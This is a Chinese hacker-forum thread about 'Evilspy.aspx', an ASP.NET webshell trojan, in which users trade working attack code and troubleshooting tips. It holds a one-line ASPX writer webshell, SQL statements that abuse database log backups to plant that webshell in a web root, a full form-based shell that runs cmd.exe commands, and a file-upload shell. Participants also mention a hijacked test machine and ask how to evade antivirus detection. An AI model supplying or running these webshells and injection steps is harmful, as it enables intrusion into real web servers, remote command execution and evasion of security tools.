[原创]Evilspy.aspx(asp.net木马ver1.2)
文章作者:swords [E.S.T]信息来源:邪恶八进制信息安全团队
'------------------------------------
'SoftName:Evilspy.aspx--asp.net木马
'Designer:swords[EST]
'QQ:78623269
'Blog:[url]http://www.dream2fly.net/index.php[/url]
'demo:请不要用于非法用途,发现bug请指正。
'下载更新:[url]http://www.dream2fly.net/index.php[/url]
'------------------------------------ Active Server Pages 错误 'ASP 0221'
无效 @ Command 原语
/dqq1.asp,行1
指定的 'import namespace="system.IO"' 选项未知或无效。
怎麽會這樣??? [quote][b]下面是引用fleecy于05-16-2005 17:12发表的:[/b]不能用啊 大哥
下面是引用crack于05-16-2005 21:51发表的:[/b]
Active Server Pages 错误 'ASP 0221'
无效 @ Command 原语
/dqq1.asp,行1
.......
[/quote]asp.net木马 ----------当然需要.net 的环境支持
单纯的asp没安装framework是无法使用的 目前只要是支持asp.net的环境就一定支持asp的!呵呵! 写了个环境探针和cmdshell,文件部分明天合并。。今天还有设计。。。 [quote][b]下面是引用neeao于05-18-2005 18:52发表的:[/b]
目前只要是支持asp.net的环境就一定支持asp的!呵呵![/quote]
同意
收藏,呵呵~ [quote][b]下面是引用swords于05-23-2005 15:56发表的:[/b]
写了个环境探针和cmdshell,文件部分明天合并。。今天还有设计。。。[/quote]
汗。。。。
由于原来测试用的肉鸡挂了,一直没开发
谁有支持.net的空间可以借我用一下啊 真的不能用啊……HTTP 500内部服务器错误…… 下载后被卡巴斯基查出是后门程序
Backdoor .asp.evspy.a
能不能修改下代码?修得它绕过杀毒工具? aspx一句话备份成功了.怎么提交不了啊..
网站是可以写入的..我只是用来测试...
我直接在网站上建一个文件加入aspx 一句话木马....用客户端提交不成功啊..
<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>
备份
alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')
backup log pubs to disk = 'd:\wwwroot\sk.aspx'
//这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。
//mu.aspx.htm 客户端:(提交后访问:[url]http://IP/images.aspx[/url])
<form action=http://192.168.2.100/sk.aspx method=post>
<textarea name=l cols=120 rows=10 width=45>
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script><html><head>
<title>ASP.NET Shell for WebAdmin2.X Final</title>
<meta http-equiv="Content-Type" c /></head><body>
<form runat="server">
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label>
<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html>
</textarea><BR><center><br>
<input type=submit value=提交>
精简版
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>')
backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx' [quote]引用第8楼傻蛋于2005-07-07 23:36发表的 :
下载后被卡巴斯基查出是后门程序
Backdoor .asp.evspy.a
能不能修改下代码?修得它绕过杀毒工具?[/quote]
打开另存为就可以免杀了。 [quote]引用第3楼neeao于2005-05-18 18:52发表的 :
目前只要是支持asp.net的环境就一定支持asp的!呵呵![/quote]
不过IIS6默认不打开asp的ISAPI。。。。
一般是开的吧? 反正我见过的都是开着的~~
关注楼主的马~~ 嘿嘿~~ 是不是aspx一句话木马有问题啊. 还是一句话木马我打错了..
asp页面不能访问啊.....服务器上只能访问aspx页面..........
“/News”应用程序中的服务器错误。
--------------------------------------------------------------------------------
编译错误
说明: 在编译向该请求提供服务所需资源的过程中出现错误。请检查下列特定错误详细信息并适当地修改源代码
编译器错误信息: CS1002: 应输入 ;
源错误:
行 1: <%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>.
源文件: E:\hualiwai\News\1.aspx 行: 1 ow.Close()%>.
后面加;ow.Close();%> [s:267] 大哥首先告诉你,你的马被杀。我初步看了以下你写的马,恕我之言,很平常,就是加载了几个函数吗。我用虽然没有学过ASP,但是我学过C#,我重新写了一个类似于你的马, [s:267] 测试了效果还不错。。。 服务器应用程序不可用
您试图在此 Web 服务器上访问的 Web 应用程序当前不可用。请点击 Web 浏览器中的“刷新”按钮重试您的请求。
管理员注意事项: 详述此特定请求失败原因的错误信息可在 Web 服务器的系统事件日志中找到。请检查此日志项以查明导致该错误发生的原因。 测试过了 比较简单 只有一个 cmdshell 的功能
页:
[1]